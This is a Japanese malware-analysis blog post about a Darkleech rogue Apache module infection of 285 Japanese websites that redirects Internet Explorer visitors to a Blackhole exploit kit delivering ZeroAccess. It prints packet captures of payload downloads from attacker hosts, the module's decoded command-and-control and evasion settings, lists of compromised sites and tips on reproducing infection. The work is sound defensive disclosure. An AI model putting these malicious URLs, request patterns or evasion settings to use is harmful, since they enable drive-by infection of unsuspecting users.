#OCJP-098： 【警告】 285件日本国内のウェブサイトが「Darkleech Apache Module」に感染されて、IEでアクセスすると「Blackhole」マルウェア感染サイトに転送されてしまいます！

日本国内の285件ウェブサイトが「Darkleech Apache Module」マルウェアに感染し、もし感染されたサイトをInternet ExplorerブラウザでアクセスしたらBlackholeの感染サイトに転送されてしまいます。転送されたらパソコンにあるPDF/Java/Flash古いバーションの脆弱性を使われて、パソコンがBlackholeで提供されているマルウェアに感染されます、との恐ろしい状況が現状日本に発見いたしました。

確認した結果は、合計285件の国内のウェブサイトが感染されまｈしたが、一覧はこのポストに下に書きましたので、あなたのウェブサイトが大丈夫かどうかは御確認して下さい。

【NEW】 感染されたサーバから拾ったマルウェアモジュールのリバースエンジニアリング調査は【こちらへ】

【感染状況の説明】

その285件のサイトにアクセスしたら、どんな転送動きになるのか説明します↓

例えば一覧にある「www.systemmetrix.jp」ドメインですね、ウェブサイトをInternet Explorerでアクセスしたら、下記のキャップチャーデータとなります↓

GET / HTTP/1.1
Accept: */*
Referer: なんでも
Accept-Language: ja
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: www.systemmetrix.jp
Connection: Keep-Alive

↑その後に、下記のBlackhole感染サイトに転送されました↓

GET /7ab2630a6a263c72/q.php HTTP/1.1
Accept: */*
Referer: http://www.systemmetrix.jp/
Accept-Language: ja
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 65.75.139.229
Connection: Keep-Alive

※）本件のリダイレクト/転送の条件があり「Internet Explorer」からのアクセスのみです。

そしてBlackholeサイトからの回答は下記となります↓

HTTP/1.1 200 OK
Date: Thu, 14 Mar 2013 17:35:11 GMT
Server: nginx/0.7.65
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.4.12
Cache-Control: max-age=1209600
Expires: Thu, 28 Mar 2013 15:57:53 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

そのhtmlテキストはマルウェア感染コードで、証拠は下記となります↓


【マルウェアの感染調査情報/感染仕方】

Blackhole感染ページに行ってしまうと古いバーションPDF/Java/Flash製品が入っているパソコンがマルウェアに感染されます。例えば古いJavaバーションが入っているIEですと感染仕方は下記のステップです↓

1. Exploitファイルをダウンロードしてしまいます↓

GET /7ab2630a6a263c72/q.php?uuzyxk=ktuew&dnlja=pgrfyh HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03
Host: 65.75.139.229
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Date: Thu, 14 Mar 2013 17:35:24 GMT
Server: nginx/0.7.65
Content-Type: application/java-archive
X-Powered-By: PHP/5.4.12
Content-Length: 20612
ETag: "1eb70b233729e2d8484da07dc006d537"
Last-Modified: Thu, 14 Mar 2013 17:02:01 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Thu, 28 Mar 2013 15:58:07 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

2.そして脆弱性が行いIEがクラッシュしてしまい、下記のshellcodeが実行されます↓


3. コードをdecodeするとマルウェアのダウンロード、実行とregistry登録コードを発見↓


4. マルウェアダウンローダーがダウンロードされてしまいます↓


5. このファイルが上記のコード通りで実行されますが、そして下記のダウンロードを行います。

GET /1.exe HTTP/1.0
Host: centra-cdn-node.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

それと…

GET /6.exe HTTP/1.0
Host: centra-cdn-node.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

↑今回は感染の目的で「ZeroACCESS」トロイのマルウェアがダウンロードされます！証拠↓


6. ダウンロードされたマルウェアが%Temp%に保存されて、ファイル名が変わりました。見た目は↓


7. ダウンロード完了した時に「ZeroACCESS」トロイを実行してしまいます↓


ZeroAccessマルウェア動いた時のスナップショット↓



8. パソコンにある情報がマルウェアサイトに送信されます↓


9. ウイルストータルで確認したら、検知率が11/45ですね↓ リンクは【こちら】

URL:  https://www.virustotal.com/en/file/a22fdaff19722f4a4d92df3f0057761cf6834a36eb54862938b77ce6ee4539bc/analysis/
SHA256: a22fdaff19722f4a4d92df3f0057761cf6834a36eb54862938b77ce6ee4539bc
SHA1:  aa6bd165bac541d02901400130b0d51374b6b319
MD5:  1deff5321ebba07b146bc712c45d218e
File size:  393.0 KB ( 402432 bytes )
File name:  812658765.exe
File type:  Win32 EXE
Tags:  peexe
Detection ratio: 11 / 45 ←発見した時の結果
Analysis date:  2013-03-14 17:03:24 UTC ←JSTだと15日の02:03;24時ですね…出張最中でホテルの中で調査した時 

さらにマルウェアの名前が色々出ました（笑↓

BitDefender  Gen:Variant.Graftor.73658  20130314
CAT-QuickHeal  (Suspicious) - DNAScan  20130314
ESET-NOD32  a variant of Win32/Kryptik.AWSR  20130314
Fortinet  W32/Kryptik.KZ!tr  20130314
GData   Gen:Variant.Graftor.73658  20130314
Malwarebytes  Malware.Packer.SGX4  20130314
McAfee   Ransom-FBGF!1DEFF5321EBB  20130314
McAfeeGWEdition Heuristic.LooksLike.Win32.Suspicious.B  20130314
eScan   Gen:Variant.Graftor.73658  20130314
PCTools  HeurEngine.ZeroDayThreat  20130314
Symantec  Suspicious.Cloud.5  20130314 

【Apacheサーバ側の感染動き調査】

先ずは感染されたサイトのトラフィックを取りましょう。
マルウェア転送された前に下記のようなpacketがあります↓


そのパケットを見たら下記のjavascriptのタグを発見し、データの中にdocument.writeなどなどが直ぐに見えます↓


Wiresharkで見辛いなので、私はデータを取って秀丸にコピーしましたので↓

↑これで、明確に分かりましたので、javascriptとiframe組み合わせ感染仕方を使われました。

色んな連絡が来ましたので、感染再現が出来る方々と出来ない方々があります、何故でしょう？
さっきのパケットをもう一度見ましょう↓

↑Cookie経由でマルウェアURLの転送仕方を監視されていますね。cookieのフォーマットは「PHP_SESSION_ID=ｘｘｘｘｘ」ですが、感染の条件がありそうですが今市です。
詰り、私の2回目以上のアクセスした場合、cookieの「ｘｘｘｘｘ」が「－１」になっています。
最初のアクセスです「ｘｘｘｘｘ」がと番号になります、例えば：「PHP_SESSION_ID=1578660372」です。

上記に書きましたように、

（１）javascript+IFRAMEの転送方法、
（２）referer条件＋マルウェアの転送コードがPCAPの中しか見えない状況、
（３）cookieで感染管理仕組みが使う方法、
（４）転送先はblackhole仕組み、
（５）Linux Apacheウェブサーバのみ、

↑の状況を含めて、Darkleech Rogue Apache Moduleの仕様となりますね、参考情報は【こちら】（その他情報はこのポストのリファレンスへ御確認下さい）。DarkleechのRogue Apache Moduleに感染されたら、サーバの権限がrootまでに取られてしまう可能性が非常に高いです。サーバをちゃんとセキュリティ調査した方がいいと思います…

他の感染されたサーバのPCAPも取りましたが、感染仕方が上記と同じですと確認しましたが、転送コードが
スナップショットは下記となります。
サイトはwww.kitsune.ne.jpです、(snipped)HTTPのパケットやり取りは下記となります↓


下記のパケット・テクストデータの所に↓


javascriptとIFRAME連携の転送スクリプトを発見しました↓



【Darkleech Rogue Apache Module研究サンプルのバイナリー調査】

「本件のDarkleechのRogue Apache Moduleはどんあ物ですか？」←との質問が沢山来ました。今回の事件に使われたmoduleが私はサーバにアクセスが出来ませんので分かりません、が、
参考として下記のウイルストータルの情報となります（elfバイナリーで自分の研究サンプルをアップロードしました）↓
URLは【こちら】

SHA1:           2ccb789d57d3ce3dd929307eb78878e6e5c61ccf
MD5:            e022de72cce8129bd5ac8a0675996318
File size:      38.3 KB ( 39176 bytes )
File name:      mod_chart_proxy.so
File type:      ELF
DetectionRatio: 28 / 45
Analysis date:  2013-03-17 20:01:44 UTC ( 0 minutes ago )

本件のモジュールのバイナリー情報は↓

MIMEType.................: application/octet-stream
CPUByteOrder.............: Little endian
CPUArchitecture..........: 64 bit
FileType.................: ELF executable
ObjectFileType...........: Shared object file
CPUType..................: AMD x86-64

リバースエンジニアリングしたら下記のコードを見えます↓

C_MODULE_VERSION: 2012.08.07
C_CC_HOST: xxx.xxx.xxx.xxx
C_CC_URI: /xxx.php
C_CC_REQUEST_FORMAT: POST %s HTTP/1.1
Host: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: %i
%s
C_MARKER_LEFT: {{{
C_MARKER_RIGHT: }}}
C_TMP_DIR: /
C_LIST_PREF: sess_
C_COOKIE_NAME: PHP_SESSION_ID=
C_ARRAY_TAGS_FOR_INJECT: ＜/script＞
＜/style＞
＜/head＞
＜/title＞
＜/body＞
＜/html＞
＜/table＞
＜/h1＞
＜/i＞
＜/ul＞
C_ARRAY_BAN_USERAGENT: CHROME
GOOGLEBOT
SLURP
YAHOO
BING
LINUX
OPENBSD
　：
CURL
PHP
INDY LIBRARY
C_ARRAY_BLACKLIST_URI: ADMIN
C_ARRAY_SE_REFERRER: GOOGLE.
YAHOO.
YANDEX.
RAMBLER.
　：
C_ARRAY_SUDOERS: r
C_ARRAY_BAN_PROC: f7277f6714e4b034216cf6558cc6327b
28878074a3dd19c7361e8a6d3f04fc17
d0415afe195478d4d8c9af205644f070
C_ARRAY_BAN_LOCAL_IP:
C_STRING_1: %i
%i%i%s
C_STRING_2: text/html
C_STRING_3: %
C_STRING_5: document.write('%s');
C_STRING_5: r
C_STRING_6: User-Agent
C_STRING_7: %s%.*s
C_STRING_8: Referer
C_STRING_9: X-Forwarded-For
C_STRING_10: Client-IP
C_STRING_11: X-Real-IP
C_STRING_12: Cookie
C_STRING_13: ;
C_STRING_14: %s/%s%s
C_STRING_15: INJECT
C_STRING_16: javascript
C_STRING_17: text/js
C_STRING_18: j
　　：
C_STRING_20: id=
C_STRING_21: %a %d-%b-%Y %H:%M:%S %Z
C_STRING_22: Set-Cookie
C_STRING_23: %s%i; expires=%s; path=/
C_STRING_24: Set-Cookie
C_STRING_25: w
C_STRING_26: %
C_STRING_27: Request-Hash
C_STRING_28: c=1&version=%s&uname=%s
C_STRING_29: c=1&version=%s&uname=
C_STRING_30: /proc/
C_STRING_31: 0123456789
C_STRING_32: /proc/%s/comm
C_STRING_33: /usr/lib/libbdl.so.0
C_STRING_34: U

↑リバースエンジニアリング調査結果コードで見ると、どうやって外部のサイトに転送されるか、cookieはどうやって監視されるか、マルウェア転送JavascriptとIFRAMEをTAGにインジェクトされるかが分かります。全て状況が今回の事件に当たりますので、今回の事件の原因はこのモジュールだと考えております。
似たようなモジュールは感染されたサイトの中に絶対にあるはずなので、サーバの管理者が調べる必要があります。

【感染された日本国内ウェブサイトの一覧】

では、感染されたサイトの一覧は下記となります↓

www.nan-paso.jp
media.yucasee.jp
www.p-game.jp
www.accordia.jp
www.taiheiyoclub.co.jp
www.hasegawa.jp
www.tmg.or.jp
ski.washigatake.jp
www.kitsune.ne.jp
www.uv100.jp
wedding.dictionarys.jp
www.hirosugi.co.jp
www.dai-one.jp
www.sports-drecome.jp
switch1.jp
ai-2006.jp
www.officeiten.jp
www.kobedenshi.ac.jp
wilco.jp
www.beo.co.jp
itopix.jp
www.chuobyoin.or.jp
www.meiji-recipe.jp
www.taiyounosato.co.jp
www.neomag.jp
www.nihon-pharm.co.jp
www.f-academy.jp
digilife.co.jp
www.greenbokujo.co.jp
www.hamure.co.jp
www.beo.jp
www.niizashiki-hp.jp
www.kakohp.jp
www.davos.co.jp
www.nishioka.co.jp
www.wasedasaga.jp
www.asakadai-hp.jp
www.eria.jp
bijinchokin.jp
shop.hasegawa.jp
crane.jp
www.goodies.co.jp
www.sapporo-secretary.jp
sm-club.jp
www.nakaoclinic.ne.jp
ec.ehiroba.jp
www.daiwa-kosan.co.jp
www.sakuraba.co.jp
www.smclub-mask.jp
www.esr-magnesia.jp
soccermama.jp
www.montana.jp
aigaku.gr.jp
www.fujikochan.jp
www.ginza-takahashi.co.jp
www.ryugaku-america.jp
www.iwaishokai.co.jp
www.parfit.co.jp
mincou.jp
www.livedata.jp
www.takman-e.co.jp
ai-amore.jp
www.montana-acce.jp
www.seikatsu-kan.jp
www.charmmy-nail.jp
ohtomi.co.jp
www.monta.co.jp
www.hitotsubashi-hp.or.jp
www.city.nakatsugawa.gifu.jp
www.nishitokyo-chuobyoin.jp
www.o-l-o.jp
www.yugi-net.jp
www.artista-toubu.jp
www.keg.ac.jp
www.asahi-izu.co.jp
www.asaji.co.jp
catshitone.jp
musicmaster.jp
www.diversey.co.jp
www.teg.ac.jp
www.platinumsalon.jp
claytherapy.jp
www.bardahl.co.jp
www.e-nation.jp
www.gifu-fureai.jp
www.osaka-ouj.jp
www.mikawa-kiko.co.jp
pocketer.jp
www.nix.co.jp
www.alife-eco.co.jp
www.ajscrum.co.jp
www.cinemamaebashi.jp
www.sportsmachine.jp
final-tokyo.co.jp
www.boz.ne.jp
hirosugi.co.jp
www.mitsuwat.co.jp
www.threewave.co.jp
gracomu.prohouse.co.jp
tsu.teg.ac.jp
www.nissin-kh.co.jp
www.souzai.or.jp
www.hozon.co.jp
www.crystalprocess.co.jp
www.hana-kara.co.jp
petit.gr.jp
o-hotel.jp
phono.co.jp
www.goodntb.co.jp
www.marinesupplies.jp
www.dcg.co.jp
www.shuchiin.jp
www.matsusakakango.jp
www.houjudo.co.jp
www.intelli.jp
bzphone.jp
www.jisys.co.jp
www.kakehagi.jp
www.kisetsu-j.jp
www.gotonohiyoko.co.jp
achilles.sports-drecome.jp
www.mplamps.co.jp
www.herbtherapist.jp
hidebo.jp
www.nacl.co.jp
www.nakanoshuzou.jp
rouren.jp
www.itakura.or.jp
www.niigata-kenban.jp
bmwmini.jp
a-yogata.lamail.jp
www.nyakurinnji.or.jp
www.y-nakamura.ed.jp
www.ohaginotanbaya.co.jp
sweatshopunion.jp
www.seikeijuku.gr.jp
www.shiroromu.jp
www.hhjc.jp
digitacho.o-l-o.jp
www.petitblanc-b.jp
www.f-mag.jp
www.fmp.or.jp
news.f-mag.jp
fudol-ranking.jp
www.freehands.jp
www.qandk.co.jp
www.jobs-go.jp
www.kart-ccf.jp
www.ust-tsu.jp
www.realstraight.co.jp
www.kogando.jp
anjo-cci.or.jp
meiji-recipe.jp
www.studioanima.co.jp
xn--ghq32cl18buo6aqwhi0b.jp
crystalprocess.co.jp
day.dictionarys.jp
www.tokushugiken.co.jp
sakuraba.co.jp
salamanca.gifu-fureai.jp
www.eiko269.jp
www.web-stage.jp
archives.kaishaseikatsu.jp
semistyle.jp
www.factoriem.jp
lymph.gto.ac.jp
beocareer.jp
mkknet.jp
www.firstinc.co.jp
www.sakaeyahonpo.co.jp
0595835055.final-tokyo.co.jp
niigatakaihomaru.jp
www.flower-happy.jp
nutral.jp
asian-breeze.jp
www.fu-ji.jp
www.fujikura-koumuten.jp
www.wall-ltd.jp
star-ships.jp
yawameshi.jp
www.nplace.jp
www.piano-doctor.co.jp
belgard.sports-drecome.jp
www.precioushair.jp
mini.riprice.co.jp
www.grandgolf.jp
gosen.sports-drecome.jp
www.greenbokujo.jp
www.greener.co.jp
www.sake-komiyama.jp
diversey.co.jp
www.growth-d.co.jp
dogland.jp
www.sinnihonsetubi.jp
www.skipkids.co.jp
www.hayashi-and.co.jp
toro.ne.jp
caruna.co.jp
www.systemmetrix.jp
ouka-lymph.jp
www.crescentinc.co.jp
usability.ueyesdesign.co.jp
www.ddn.ne.jp
www.ibtecno.co.jp
www.icare-shop.jp
www.ictb-global.jp
www.wa2.jp
www.illumi.co.jp
volleyball.sports-drecome.jp
www.oasiscorp.jp
www.ohnobellows.co.jp
www.order-shirt.co.jp
www.it-office.jp
hikone.lamail.jp
www.pannet.co.jp
www.j-c-a.co.jp
www.jdct.jp
cs.sunfirst.co.jp
www.pikka.jp
www.pinole.co.jp
www.jrc.ne.jp
www.jsu-nagano.co.jp
www.jtech-u.co.jp
www.kaishaseikatsu.jp
www.kaitorihonpo.jp
www.kamakura-bori.jp
www.kanagawa-exp.co.jp
www.karacoro.co.jp
www.kawarasoba-pin.co.jp
chelsea.jp
www.bravesoft.co.jp
www.kikuyou.jp
mieeeru.go.jp
www.able-ryowa.co.jp
www.kisoacoustic.co.jp
china-ac.jp
www.konzouji.jp
www.kotohiki-kairo.co.jp
www.kyoto-jc.or.jp
a-yogash.lamail.jp
www.canam.co.jp
www.ryugaku-aus.jp
a-yogatz.lamail.jp
accordia.jp
www.sighci.jp
www.aki-jewelry.co.jp
www.sksya.jp
www.softadvance.co.jp
www.chesil.jp
jcm-s.co.jp
www.chouei-kougyo.co.jp
accum.jp
analist.jp
www.starform.co.jp
www.manya.jp
www.matsunoe.jp
www.anjo-cci.or.jp
www.m-daiichi.jp
kasorisekkotsuin.jp
www.mie-sanpai.or.jp
www.cp-style.co.jp
www.archi-net.co.jp
www.aromastore.jp
www.toruzou.jp
www.mk-one.co.jp
www.uesugi-hifuka.or.jp
www.m-virgin.jp
konanyamate.lamail.jp
koshok.jp
www.deridos.jp
ksk2003.jp
www.watanabe-kanpou.jp
www.narahara-jyuusetu.jp
www.narimasu.gr.jp
www.d-harada.jp
kubotaslugger.sports-drecome.jp
www.nda.or.jp
lady-1st.jp
www.dirac-inc.co.jp
lamail.jp
www.nishi-dentsu.co.jp
battery.o-l-o.jp
www.zamza.jp
xn--yckr6hnb9a5933b9i8bye0abmu.jp
years.co.jp　

【感染の原因：Rogue Apache Module】

何故上記のサイトからの転送仕組みが出来てしまうかというと…

先ずは全て感染されたサイトがApacheウェブサーバですね、
「ApacheのRogue Module」経由のマルウェア、「Darkleech's Apache Module」マルウェアと呼ばれている物がありますので、このマルウェアに感染されております。
外から見るとサーバの中身が分からないなので、管理者や責任者にはApache Moduleのファイルを御確認した方がいいとおもいます。その関連のマルウェアコードが絶対にあるはずです。

Apache Moduleマルウェアがどうやって入ったのかは、可能性敵には２つしか無いので：

1. サーバログイン情報が漏れた
2. サーバにあるアプリ/サービスの脆弱性の経由でサーバのアクセスが取られてしまう（ハッキング）

↑なので、念のためにサーバのFTPのログイン情報を変更して、サーバをしっかりセキュリティチェックをやった方がいいと思います。
※備考：サーバのroot権限が取られてしまう可能性もあります。

【リファレンス/情報】

Googleで「Darkleech Apache Module」又は「Rogue Apache Module」又は「Linux/Chapro.A 」を検索したら沢山情報が見れますが、私のおすすめリファレンスは下記のリンクとなります（英文ですみません）↓
[１] [２] [３] [４] [５] [６] [７]
実は、本件を発見したばっかりで、びっくりしました。なんども確認しましたので、間違いがありません…本当にびっくり…
現状は未だ調査を続いていますので、感染されたウェブサイトの数がもっと増える可能性が高いです…　
本件の情報を参考にして、自分のサーバが大丈夫かどうかを詳しく検証してお願いします。

皆さん、日本のネットワークを守りましょう！

海外の研究者仲間達には、ご協力頂き有難う御座います！

【色々追加調査情報】

【追加情報その１】@unixfreaxjp ~]$ date
Sun Mar 17 04:50:04 JST 2013

転送先の「Blackhole」マルウェアサイト/URLの一覧を作りましたので、もし見たいなら安全なアクセスが【こちら】
それと、別件ですが関係がありますが、↑そのBlackhole一覧の中にまた別途２件二本国内のIPを入れました、Blackholeに感染されましたね、IP情報は→「157.14.29.129」と「157.14.29.108」、この2件もクリーンアップした方がいいと思いますので、感染URL情報は↓

157,14,29,108/8341acc2f4873e3208fe9c0c19f7214f/8341acc2f4873e3208fe9c0c19f7214f/q.php
157,14,29,129/b663dfbe76739afffd9bf66cac89533f/b663dfbe76739afffd9bf66cac89533f/q.php 

その２件日本側感染IPについて、whoisで情報を確認が出来ますが、下記となります↓

inetnum:        157.14.0.0 - 157.14.95.255
netname:        TCP-IP-NET
country:        JP
descr:          TCP Inc.
admin-c:        RY259-AP
tech-c:         TS441-AP
tech-c:         YK956-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-JPNIC
mnt-lower:      MAINT-JPNIC
mnt-irt:        IRT-JPNIC-JP
changed:        hm-changed@apnic.net 20120208
source:         APNIC

person:         Ryoichi Yokoi
nic-hdl:        RY259-AP
e-mail:         yoc@tcp-net.ad.jp
address:        Sugimoto Building.5F, 4-10-15, Masaki, Naka-ku, Nagoya, Aichi 460-0024
phone:          +81-52-678-2080
fax-no:         +81-52-678-2081
country:        JP
changed:        ip-apnic@nic.ad.jp 20080408
mnt-by:         MAINT-JPNIC
source:         APNIC

person:         Tsunehiko Suzuki
nic-hdl:        TS441-AP
e-mail:         tss@reflection.co.jp
address:        Showa bld. 5F 3-26-4 Sakae, Naka-ku, Nagoya
phone:          +81-52-269-5137
fax-no:         +81-52-269-5138
country:        JP

【追加情報その２】@unixfreaxjp ~]$ date
Sun Mar 17 16:45:20 JST 2013

「Blackhole→ダウンローダー→トロイの感染した時の詳細なPCAP情報がありますか？」との連絡が頂きましたので、PCAP情報がありますが、下記のようにとなります（大きくみたいならクリックして下さい）、下記のPCAP画像を見ながら説明をさせて頂きます↓

マークされた紫色には2件動きがあります、最初のGET URLはBlackholeのjava exploit(jarファイル)のダウンロードです。
そのexploitファイル（本件にはjarのexploitですが、確認した限りpdfとswfファイルもそのblackholeサーバにありそうです）を起動されたらパソコンが（次のURL）からマルウェアのpayload（トロイダウンローダー）をダウンロードしてしまいました。
上記のcrackしたshellcodeに書いたコードようにこのpayloadが保存、起動、登録されて、そしてパソコンが感染してしまう状況となります。

マークされた紫色には2件のダウンロードURLがあります。
1件目のURLはZeroAccessトロイ（VTレポートに詳細な説明が書いてあります）←感染の目的です。
赤色マークにある2件目のurlが失敗したので、ダウンロードが不可能でした。

【本件の事件対応タイムライン】

#OCJP-098： 【警告】 285件日本国内のウェブサイトが「Darkleech Apache Module」に感染されて、IEでアクセスすると「Blackhole」マルウェア感染サイトに転送されています！ unixfreaxjp.blogspot.jp/2013/03/ocjp-0… ＜ 危険な状況…

— Hendrik ADRIAN (@unixfreaxjp) March 14, 2013

#OCJP-098 (285件日本国内のウェブサイトがマルウェア転送Rogue Apache Moduleに感染されたの件)の追加情報、転送先の情報を追加しましたのでページの下書きました→ unixfreaxjp.blogspot.jp/2013/03/ocjp-0… Cc: @kchr @jpcert

— Hendrik ADRIAN (@unixfreaxjp) March 16, 2013

【重要】#OCJP-098 (285件日本国内のウェブサイトがマルウェア転送 #Darkleech #Apache Moduleに感染されたの件)の追加情報： サーバ側の感染動き調査結果をブログに追加しました→ unixfreaxjp.blogspot.jp/2013/03/ocjp-0… #malware

— Hendrik ADRIAN (@unixfreaxjp) March 17, 2013

#OCJP-098に対する、日本国内サーバが沢山感染されているDarkleech's Rogue Apacheモジュールの件、①モジュールのファイル情報と゜②バイナリーリバースエンジニアリング調査結果を追加しました unixfreaxjp.blogspot.jp/2013/03/ocjp-0… #malware

— Hendrik ADRIAN (@unixfreaxjp) March 17, 2013

【本件についてのQ&A】

@kchr ちなみに本件の感染仕組みの目的が分かる気がします。決まった感染されたウェブサイトからのトラフックのみでトロいをパソコンに感染したいみたいので、セッティングが必要で、どっかの犯罪者グルプが日本を狙っていますね。ターゲットされたのはボットネットと個人ログイン認証だろうなぁ

— Hendrik ADRIAN (@unixfreaxjp) March 15, 2013

@ryuuji_y 情報頂き有り難うございます、現在あちこちで監視とクリーニング中なので外部からの検証を止めた方がいいと思います、しばらくはお待ちましょう。管理者はサーバの中身を確認すれば直ぐに原因が分かりますから。調査が難しくないと思います。

— Hendrik ADRIAN (@unixfreaxjp) March 16, 2013

@kchr 現状をもう一度調査しました。サーバ側の動きを書きました：　unixfreaxjp.blogspot.jp/2013/03/ocjp-0…　←これでDarkleechのモジュールが確定です。クライアント：Internet ExplorerとサーバはLinux Apacheのみで…その他はまた明日4649

— Hendrik ADRIAN (@unixfreaxjp) March 17, 2013

@tattsuyan ブログに書いた285件の感染されたのサイトは17日（金曜日）大体朝5時迄には全て感染されたと”ちゃんと”確認しました。当時確認したのサイトの合計は大体400件ぐらいがありましたが、確実に感染されたサイトだけは285件でした。（長いので、つづく…）

— Hendrik ADRIAN (@unixfreaxjp) March 18, 2013

@tattsuyan 条件があって①ブラウザはIE、②REFERERが無いと行け無い、”例え、googleで確認したいのでサイトを検索してからクリックする、③最新版AdobeReader,Java,Flashが入っているPCにはBHEK2.xサイトに転送されたが感染にはならない。

— Hendrik ADRIAN (@unixfreaxjp) March 18, 2013

@tattsuyan IEのUAが必要（例え： howtogeek.com/howto/18450/ch…）、古いjavaバーション7.11以下、Adobeとflashは適当に古いバーションに戻し。アクセスした時にニセrefererを作るようにhttp proxyやjumper使うと。

— Hendrik ADRIAN (@unixfreaxjp) March 18, 2013

【最後に、アドバイス＋考え方】

色んな質問頂き有難うございます。昨夜そのマルウェアApacheモジュールのELF x64バイナリーのサンプルを分析調査（リバースエンジニアリング）をし調査結果を0day.jpのブログに書きました。感染されたサイとがどうやって感染されるかは調査結果を見たら分かると思います。調査以上

— Hendrik ADRIAN (@unixfreaxjp) March 18, 2013

そのマルウェアApacheモジュール（mod_chart_proxy.soかどうか名前は別にして、x32 ELFかx64かも知れないし）似たような物が感染されたサーバに【絶対に】ありますので、変な「.so」モジュールがあるかどうかを探すべきです←Linux＋Apache限定の感染

— Hendrik ADRIAN (@unixfreaxjp) March 18, 2013

最後に、大問題なのは、全て感染されたウェブサーバのログイン管理権限が間違いなく取られてしまいました事 ←マルウェア感染よりもこの件が超まずいです。およそr00t迄の権限が取られた【はず】ですが←”早めに”御確認下さい。もはや信用が出来ないサーバが直ぐにインターネットから抜いて！

— Hendrik ADRIAN (@unixfreaxjp) March 18, 2013

--
【ご注意】
本件のポストに書いた情報は(c)0day.jpのマルウェア研究調査の物となります。調査内容の無断転載禁止です。使いたい方は@unixfreaxjpにご連絡下さい。